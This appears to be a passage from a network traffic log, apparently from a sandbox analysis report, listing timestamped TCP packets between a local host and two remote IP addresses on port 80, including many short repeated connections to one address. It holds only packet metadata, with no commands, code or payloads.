Nov 20, 2024 10:11:25.851166010 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.851177931 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.851188898 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.851202965 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.851214886 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.851278067 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.851289988 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.851300001 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.851310968 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.851319075 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.851325989 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.851325989 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.851339102 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.851345062 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.851356983 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.851372004 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.852159023 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.852170944 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.852181911 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.852193117 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.852200985 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.852206945 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.852215052 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.852227926 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.852241039 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.852287054 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.852298975 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.852308989 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.852320910 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.852332115 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.852334023 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.852344990 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.852348089 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.852358103 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.852370977 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.852385998 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.853059053 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.853070974 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.853081942 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.853094101 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.853101969 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.853105068 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.853115082 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.853117943 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.853130102 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.853147030 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.853194952 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.853207111 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.853229046 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.853241920 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.896905899 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.896919012 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.896930933 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.896965027 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.896980047 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.896991014 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.897005081 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.897042036 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.897177935 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.897188902 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.897202015 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.897216082 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.897219896 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.897241116 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.897253990 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.897435904 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.897454023 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.897465944 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.897476912 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.897488117 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.897497892 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.897516012 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.897783041 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.897794008 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.897805929 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.897815943 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.897825956 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.897842884 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.935744047 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.935777903 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.935789108 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.935801983 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.935836077 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.935836077 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.935887098 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.935899019 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.935909986 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.935923100 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:25.935928106 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.935942888 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:25.935955048 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:30.056107044 CET	80	49170	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:30.058229923 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:33.292522907 CET	49170	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:34.073167086 CET	49171	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:34.078253984 CET	80	49171	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:34.082261086 CET	49171	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:34.224472046 CET	49171	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:34.232295036 CET	80	49171	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:34.232361078 CET	49171	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:34.240298986 CET	80	49171	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:34.825088978 CET	80	49171	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:34.825139046 CET	80	49171	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:34.825228930 CET	49171	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:34.825299978 CET	49171	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:34.831660032 CET	80	49171	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:34.920490980 CET	49172	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:34.926080942 CET	80	49172	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:34.926163912 CET	49172	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:34.927901030 CET	49172	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:34.936938047 CET	80	49172	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:34.936985970 CET	49172	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:34.944359064 CET	80	49172	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:35.688764095 CET	80	49172	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:35.688999891 CET	49172	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:35.689007998 CET	80	49172	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:35.689060926 CET	49172	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:35.698219061 CET	80	49172	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:35.741369963 CET	49173	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:35.746495008 CET	80	49173	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:35.746566057 CET	49173	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:35.748172045 CET	49173	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:35.753206968 CET	80	49173	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:35.753276110 CET	49173	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:35.758224964 CET	80	49173	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:36.639029026 CET	80	49173	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:36.639056921 CET	80	49173	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:36.639270067 CET	49173	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:36.639271021 CET	49173	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:36.644738913 CET	80	49173	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:36.774934053 CET	49174	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:36.780591965 CET	80	49174	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:36.780663967 CET	49174	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:36.782336950 CET	49174	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:36.788336039 CET	80	49174	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:36.788419962 CET	49174	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:36.795069933 CET	80	49174	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:37.678376913 CET	80	49174	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:37.678663969 CET	80	49174	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:37.678740978 CET	49174	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:37.684017897 CET	49174	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:37.690893888 CET	80	49174	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:37.847090006 CET	49175	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:37.854008913 CET	80	49175	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:37.854104996 CET	49175	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:37.858225107 CET	49175	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:37.865158081 CET	80	49175	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:37.865230083 CET	49175	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:37.872039080 CET	80	49175	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:38.715972900 CET	80	49175	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:38.716087103 CET	80	49175	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:38.716248989 CET	49175	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:38.717058897 CET	49175	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:38.721966982 CET	80	49175	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:39.918752909 CET	49176	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:39.927398920 CET	80	49176	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:39.927450895 CET	49176	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:39.929833889 CET	49176	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:39.935384035 CET	80	49176	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:39.935431004 CET	49176	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:39.940442085 CET	80	49176	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:40.657332897 CET	80	49176	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:40.657396078 CET	80	49176	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:40.657532930 CET	49176	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:40.657691002 CET	49176	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:40.665595055 CET	80	49176	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:40.789243937 CET	49177	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:40.796134949 CET	80	49177	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:40.796216011 CET	49177	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:40.798015118 CET	49177	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:40.804784060 CET	80	49177	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:40.804852962 CET	49177	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:40.809890032 CET	80	49177	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:41.542538881 CET	80	49177	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:41.542742968 CET	49177	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:41.542759895 CET	80	49177	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:41.543102026 CET	49177	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:41.549084902 CET	80	49177	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:41.678031921 CET	49178	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:41.683163881 CET	80	49178	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:41.683253050 CET	49178	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:41.684906006 CET	49178	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:41.692797899 CET	80	49178	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:41.692874908 CET	49178	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:41.699554920 CET	80	49178	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:42.435044050 CET	80	49178	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:42.435091972 CET	80	49178	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:42.435168982 CET	49178	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:42.436405897 CET	49178	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:42.442905903 CET	80	49178	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:42.575524092 CET	49179	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:42.582546949 CET	80	49179	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:42.586289883 CET	49179	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:42.587925911 CET	49179	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:42.595666885 CET	80	49179	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:42.598310947 CET	49179	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:42.606062889 CET	80	49179	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:43.356853008 CET	80	49179	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:43.356901884 CET	80	49179	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:43.357084990 CET	49179	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:43.357192039 CET	49179	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:43.362123013 CET	80	49179	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:43.496809959 CET	49180	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:43.501852036 CET	80	49180	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:43.501925945 CET	49180	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:43.503565073 CET	49180	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:43.508394003 CET	80	49180	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:43.508450985 CET	49180	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:43.513245106 CET	80	49180	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:44.250286102 CET	80	49180	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:44.250417948 CET	49180	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:44.250993013 CET	80	49180	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:44.251413107 CET	49180	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:44.258105993 CET	80	49180	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:44.388082981 CET	49181	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:44.396356106 CET	80	49181	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:44.398220062 CET	49181	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:44.400038004 CET	49181	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:44.410067081 CET	80	49181	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:44.410226107 CET	49181	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:44.418309927 CET	80	49181	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:45.152724028 CET	80	49181	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:45.152865887 CET	49181	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:45.154939890 CET	80	49181	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:45.155014038 CET	49181	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:45.158360958 CET	80	49181	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:46.053661108 CET	49182	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:46.058945894 CET	80	49182	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:46.059011936 CET	49182	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:46.061436892 CET	49182	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:46.066911936 CET	80	49182	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:46.066976070 CET	49182	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:46.074651957 CET	80	49182	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:46.807615995 CET	80	49182	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:46.807743073 CET	49182	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:46.808214903 CET	80	49182	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:46.808264971 CET	49182	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:46.817045927 CET	80	49182	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:47.077811956 CET	49183	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:47.085195065 CET	80	49183	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:47.085254908 CET	49183	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:47.086957932 CET	49183	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:47.094245911 CET	80	49183	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:47.094305992 CET	49183	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:47.101397038 CET	80	49183	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:47.853576899 CET	80	49183	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:47.853601933 CET	80	49183	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:47.853621006 CET	80	49183	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:47.853851080 CET	49183	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:47.853851080 CET	49183	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:47.859108925 CET	80	49183	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:47.989818096 CET	49184	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:47.995135069 CET	80	49184	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:47.995213985 CET	49184	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:47.996814013 CET	49184	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:48.001868010 CET	80	49184	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:48.001930952 CET	49184	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:48.007328987 CET	80	49184	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:48.762204885 CET	80	49184	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:48.762367964 CET	80	49184	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:48.762372017 CET	49184	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:48.762420893 CET	49184	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:48.768498898 CET	80	49184	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:48.898514032 CET	49185	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:48.906471014 CET	80	49185	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:48.906577110 CET	49185	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:48.908246040 CET	49185	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:48.916369915 CET	80	49185	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:48.916450024 CET	49185	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:48.924226046 CET	80	49185	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:49.780787945 CET	80	49185	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:49.780836105 CET	80	49185	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:49.780926943 CET	49185	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:49.781272888 CET	49185	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:49.786314011 CET	80	49185	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:49.916707993 CET	49186	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:49.922172070 CET	80	49186	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:49.926230907 CET	49186	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:49.927817106 CET	49186	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:49.933224916 CET	80	49186	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:49.934221029 CET	49186	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:49.939827919 CET	80	49186	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:50.661518097 CET	80	49186	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:50.661596060 CET	80	49186	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:50.661712885 CET	49186	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:50.662120104 CET	49186	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:50.669656992 CET	80	49186	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:50.806582928 CET	49187	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:50.815398932 CET	80	49187	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:50.815511942 CET	49187	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:50.817913055 CET	49187	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:50.825267076 CET	80	49187	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:50.825355053 CET	49187	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:50.831866026 CET	80	49187	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:51.563699961 CET	80	49187	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:51.563862085 CET	80	49187	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:51.563927889 CET	49187	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:51.571392059 CET	49187	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:51.578702927 CET	80	49187	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:51.933238029 CET	49188	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:51.939397097 CET	80	49188	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:51.939460993 CET	49188	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:51.969063997 CET	49188	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:51.974211931 CET	80	49188	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:51.974265099 CET	49188	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:51.979376078 CET	80	49188	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:52.677114010 CET	80	49188	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:52.677248955 CET	80	49188	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:52.677319050 CET	49188	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:52.677320004 CET	49188	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:52.682271004 CET	80	49188	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:52.820596933 CET	49189	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:52.825858116 CET	80	49189	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:52.825979948 CET	49189	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:52.828480005 CET	49189	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:52.833398104 CET	80	49189	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:52.833476067 CET	49189	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:52.838449955 CET	80	49189	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:53.596098900 CET	80	49189	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:53.596185923 CET	80	49189	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:53.596271038 CET	49189	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:53.596422911 CET	49189	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:53.605545044 CET	80	49189	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:53.730436087 CET	49190	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:53.735723972 CET	80	49190	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:53.735794067 CET	49190	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:53.737376928 CET	49190	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:53.743145943 CET	80	49190	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:53.743942022 CET	49190	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:53.749506950 CET	80	49190	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:54.506406069 CET	80	49190	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:54.506581068 CET	49190	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:54.506875038 CET	80	49190	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:54.506928921 CET	49190	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:54.512561083 CET	80	49190	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:54.646716118 CET	49191	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:54.655775070 CET	80	49191	94.156.177.41	192.168.2.22
Nov 20, 2024 10:11:54.655879974 CET	49191	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:54.658297062 CET	49191	80	192.168.2.22	94.156.177.41
Nov 20, 2024 10:11:54.665674925 CET	80	49191	94.156.177.41	192.168.2.22
